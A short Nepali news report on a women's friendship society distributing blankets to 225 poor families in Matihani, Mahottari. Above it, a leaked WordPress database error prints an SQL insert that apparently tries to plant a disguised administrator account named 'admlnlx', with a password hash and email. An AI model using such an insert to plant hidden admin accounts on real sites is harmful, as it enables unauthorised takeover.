WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ8e0/bkKs49s1qTATnl6jqfYWi/59.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-13 15:16:29', '', 'admlnlx', 'admlnlx')
गौशाला ,माघ २७ –
नेपाल भारत महिलामैत्री समाज काठमाडौँले महोत्तरी जिल्लाको मटिहानी गाविसका २२५ परिवारलाई आज बिहान कम्बल वितरण गरेको छ ।
माघ अन्तिम साता लागिसक्दा पनि महोत्तरीमा जाडो कम नहुँदा जाडोबाट प्रभावित मटिहानीका २२५ विपन्न परिवारलाई समाजले कम्बल वितरण गरेको हो । मटिहानीस्थित राम उमाविको प्राङ्गणमा समाजकी केन्द्रीय अध्यक्ष श्रीमती चन्दा चौधरीले मटिहानी– १ देखि ९ सम्मका २२५ विपन्न परिवारलाई कम्बल वितरण गर्नुभएको हो । महोत्तरीमा अझै पनि कठ्याङ्ग्रिदो असहनीय जाडो भइरहेको बेला समाजले स्थानीयलाई कम्बल वितरण गरेकोमा स्थानीय खुसी देखिएका छन् । -रासस